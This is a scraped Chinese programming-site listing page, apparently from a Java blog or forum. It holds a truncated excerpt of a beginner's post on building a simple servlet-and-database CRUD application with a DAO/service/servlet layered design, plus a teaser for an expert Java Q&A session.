         第一篇博客不知道要写点什么,就先来点近阶段的感悟吧。     这几天学了servlet和数据库等知识,就参照老方的视频写了一个简单的增删改查的,完成了最简单的一些功能,使用了三层架构。 dao层完成的是对数据库具体的功能实现,service层调用了dao层的实现方法,具体对servlet提供支持。  &
  • 高手问答:Java老A带你全面提升Java单兵作战能力! ITeye管理员 java
    本期特邀《Java特种兵》作者:谢宇,CSDN论坛ID: xieyuooo 针对JAVA问题给予大家解答,欢迎网友积极提问,与专家一起讨论! 作者简介: 淘宝网资深Java工程师,CSDN超人气博主,人称“胖哥”。 CSDN博客地址: http://blog.csdn.net/xieyuooo 作者在进入大学前是一个不折不扣的计算机白痴,曾经被人笑话过不懂鼠标是什么,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他